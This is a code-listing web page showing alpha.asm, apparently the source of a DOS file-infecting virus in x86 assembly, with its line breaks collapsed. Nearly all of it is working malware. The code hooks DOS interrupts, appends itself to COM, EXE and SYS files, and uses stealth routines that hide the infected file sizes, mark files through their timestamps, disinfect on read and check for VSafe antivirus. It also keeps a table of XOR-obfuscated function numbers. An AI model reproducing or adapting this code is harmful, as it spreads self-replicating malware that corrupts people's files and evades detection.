📄 alpha.asm
字号:
int 21h push es push bx mov ah, 25h mov dx, offset zeroal_iret int 21h mov ah, 4Eh mov cl, 27h call setdxtobuffer_int21 jb restoreint24anddta mov si, offset header sub di, di mov al, [si+18h] mov attribs, al cmp byte ptr [si], 2 ja notdriveAorB call loc_0_272 jz checkfiletyperestoreint24anddta: mov ax, 2524h pop dx pop ds int 21h mov ah, 1Ah pop dx pop ds int 21htogglevsafe db 0B3hvsafestatus db 16hvsafe: mov ax, 0FA02h mov dx, 5945h int 16h mov cs:vsafestatus, clret4: ret notdriveAorB: cmp [si+12h], di jnz checkfiletype cmp word ptr [si+10h], 2 jb restoreint24anddta cmp byte ptr [si], 3 jb checkfiletype mov ah, 2Ah int 21h sub cx, 7BCh mov ax, [si+1Bh] shr ax, 1 cmp ah, cl jnz checkfiletype shr ax, 4 and al, 0Fh cmp al, dh jz restoreint24anddtacheckfiletype: mov bp, offset setcarry_ret cmp word ptr [si+21h], 4254h ; TB* jz restoreint24anddta cmp word ptr [si+0Ch], 4F43h ; CO jnz notcominfection mov bp, offset infectcomnotcominfection:cmp word ptr [si+1Eh], 0Bh jb restoreint24anddta cmp byte ptr [si+1Ch], 0C8h jnb restoreint24anddta mov al, [si+18h] and al, 7 jz attributesok sub cx, cx call setattribs jb restoreint24anddtaattributesok: mov ax, 3D02h call setdxtobuffer_int21 jb near ptr restoreattribs xchg ax, bx mov ah, 3Fh mov cx, 19h call readwritefromsi mov ax, [si] xchg al, ah cmp ax, 4D5Ah jnz notexeinfection mov bp, offset infectexe jmp notsysinfectionnotexeinfection:cmp ax, 0FFFFh jnz notsysinfection mov bp, offset infectsysnotsysinfection:call bp jb dontwriteheader call writeheaderdontwriteheader:mov ax, 5700h mov cx, [si+19h] mov dx, [si+1Bh] inc ax int 21h mov ah, 3Eh int 21hrestoreattribs db 0B1hattribs db 20h call setattribs jmp restoreint24anddtasetattribs: mov ax, 4301hsetdxtobuffer_int21: mov ch, 0 mov dx, offset buffer jmp int21infectexe: cmp byte ptr [si+18h], 40h ;WINDOZE EXE ? jz setcarry_ret mov ax, [si+4] dec ax mov cx, 200h mul cx add ax, [si+2] adc dx, di cmp [si+1Dh], ax jnz setcarry_ret cmp [si+1Fh], dx jz nointernaloverlayssetcarry_ret: stc ret nointernaloverlays: mov ax, [si+0Eh] mov ds:savess, ax mov ax, [si+10h] mov ds:savesp, ax mov ax, [si+16h] mov ds:savecs, ax mov ax, [si+14h] mov ds:saveip, ax call appendvirus jb exitinfectexe mov ax, [si+8] mov cl, 10h mul cx neg ax not dx add ax, [si+1Dh] adc dx, di add dx, [si+1Fh] div cx mov [si+16h], ax mov [si+14h], dx dec ax mov [si+0Eh], ax mov word ptr [si+10h], 9D2h add word ptr [si+0Ah], 0ADh mov ax, [si+1Dh] mov dx, [si+1Fh] add ax, virussize adc dx, di mov cx, 200h div cx inc ax mov [si+4], ax mov [si+2], dx clc exitinfectexe: ret infectcom: cmp word ptr [si+1Eh], 0D6h ja exitcominfect mov ax, [si] mov word ptr ds:first2, ax mov al, [si+2] mov byte ptr ds:next1, al mov ax, 0FFF0h mov ds:savecs, ax mov ds:savess, ax mov word ptr ds:saveip, 100h mov word ptr ds:savesp, 0FFFEh call appendvirus jb exitcominfect mov byte ptr [si], 0E9h mov ax, -3 ;0FFFDh add ax, [si+1Dh] mov [si+1], ax clc exitcominfect: ret infectsys: mov ax, [si+8] mov word ptr ds:sysret, ax mov word ptr ds:sysret2, ax call appendvirus jb ret5 mov ax, [si+1Dh] add ax, offset sysentry mov [si+8], ax clc ret5: ret appendvirus: mov al, 2 call lseek mov ah, 40h mov cx, virussize cwd call int21 cmp ax, cx stc jnz ret1 add byte ptr [si+1Ch], 0C8hlseekstart: mov al, 0lseek: mov ah, 42h cwd mov cx, dxdoint21: int 21hret1: ret lseekbeforeend: mov ax, 4202h mov cx, 0FFFFh jmp doint21checkhandle: cmp bl, 5 ;LAME HANDLE CHEQ. jb exittimestealthcheckinfection: mov ax, 5700h int 21h jb exittimestealth cmp dh, 0C8hexittimestealth:ret blocklseek: cmp al, 2 jnz ret1 call checkinfection jb ret1 pop ax call near ptr restoreregs push cx sub dx, virussize sbb cx, 0 int 21h pop cx jmp setvirusactive_exitsetnodirstealth:mov al, 0C3hsetdirstealth: mov byte ptr cs:fcbdirstealth, al ret fcbdirstealth: nop inc sp inc sp int 21h cmp al, 0FFh jz setvirusactive_exit pushf push ax call getdta cmp byte ptr [bx], 0FFh jnz notextended add bx, 7notextended: cmp [bx+1Ah], al jb exitdirstealth sub [bx+1Ah], al add bx, 3 jmp stealthdirsizegetdta: mov ah, 2Fh int 21h mov al, 0C8h push es pop ds ret asciidirstealth:inc sp inc sp int 21h jb setvirusactive_exit pushf push ax call getdta cmp [bx+19h], al jb exitdirstealth sub [bx+19h], alstealthdirsize: cmp word ptr [bx+1Bh], 0Bh jb exitdirstealth sub word ptr [bx+1Ah], virussize sbb word ptr [bx+1Ch], 0exitdirstealth: call restoreregs pop ax popf setvirusactive_exit: call setvirusactive jmp exitkeepflagsreadoldheader: mov al, 1 call lseek push cs pop ds mov oldposlo, ax mov oldposhi, dx mov si, offset header cmp handle, bl jz ret0 mov dx, 0FFDFh call lseekbeforeend mov ah, 3Fh mov cx, 21h call readwritefromsi mov handle, bllseektooldpos: mov ax, 4200h db 0B9holdposhi dw 0 db 0BAholdposlo dw 0 int 21hret0: ret disinfecthandle:call checkhandle jb ret0 push cx push dx call readoldheader call lseekstart call writeheader mov dx, 0F830h ; -virussize call lseekbeforeend mov ah, 40h sub cx, cx int 21h pop dx pop cx sub dh, 0C8h mov ax, 5701h int 21h jmp lseektooldposstealthread: mov bp, cx call checkhandle jb ret0 pop ax call readoldheader sub ax, [si+1Dh] sbb dx, 0 sub dx, [si+1Fh] js adjustread call restoreregsandsetvirusactive sub ax, ax clc exitkeepflags: retf 2adjustread: add ax, bp adc dx, 0 jnz bigread sub bp, axbigread: push bp call near ptr restoreregs pop cx int 21h pushf push ax jb exitstealthread push ds pop es mov di, dx push cs pop ds mov si, offset header cmp oldposhi, 0 jnz exitstealthread mov ax, oldposlo cmp ax, 18h jnb exitstealthread add si, ax add cx, ax cmp cx, 18h jbe moveit sub ax, 18h neg ax xchg ax, cxmoveit: cld rep movsbexitstealthread:call restoreregsandsetvirusactive pop axpopf_exitwithflags: popf jmp exitkeepflagsgettimestealth: cmp byte ptr cs:stealthmode, 12h jnz dotimestealth cmp al, 0 jz ret2setfullstealth: mov byte ptr cs:stealthmode, 14h ret dotimestealth: cmp al, 0 jnz settimestealth inc sp inc sp int 21h pushf jb setvirusactive_exit1 call removemarkerfromdhsetvirusactive_exit1: call setvirusactive jmp popf_exitwithflagssettimestealth: call setfullstealth mov ax, 5700h int 21h jb ret2 pop ax cmp dh, 0C8h call near ptr restoreregs jb removemarkeranddoint21 cmp dh, 0C8h jnb doint21andexit add dh, 0C8hdoint21andexit: int 21h pushf jmp setvirusactive_exit1removemarkeranddoint21: call removemarkerfromdh jmp doint21andexitremovemarkerfromdh: cmp dh, 0C8h jb notmarked sub dh, 0C8hnotmarked: ret sethandletozero:mov cs:handle, 0ret2: ret ; NOTE : ALL FUNKTIONZ ARE XORED WITH 5Fhfunctions db 013h ; 4Ch - prog terminate db 017h ; 48h - create mem block db 016h ; 49h - release memory db 015h ; 4Ah - resize mem block db 00Dh ; 52h - get SYSVARS db 0B5h ; 0EAh - ALLOC HUGE SEG db 06Dh ; 32h - GET DPB db 014h ; 4Bh - program EXEC db 062h ; 3Dh - open file db 04Eh ; 11h - fcb FindFirst db 04Dh ; 12h - fcb FindNext db 011h ; 4Eh - ASCII FindFirst db 010h ; 4Fh - ASCII FindNext db 008h ; 57h - get/set file time db 033h ; 6Ch - extended open db 01Ch ; 43h - get/set attribs db 061h ; 3Eh - handle close db 01Fh ; 40h - handle write db 01Dh ; 42h - lseek db 060h ; 3Fh - handle readfunctionoffsets dw offset setnofilestealth dw offset memstealth dw offset memstealth dw offset memstealth dw offset hideourmem dw offset modifytomseginpsp dw offset setnodirstealth dw offset execute dw offset infectdx dw offset fcbdirstealth dw offset fcbdirstealth dw offset asciidirstealth dw offset asciidirstealth dw offset gettimestealth dw offset infectsi dw offset infectdx dw offset sethandletozero dw offset disinfecthandle dw offset blocklseek dw offset stealthreadheader db 0CDh,020h,090htempdta db 3Ch dup (0)buffer db 80h dup (0)handle db 0virussize = 7D0h end virus_start⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -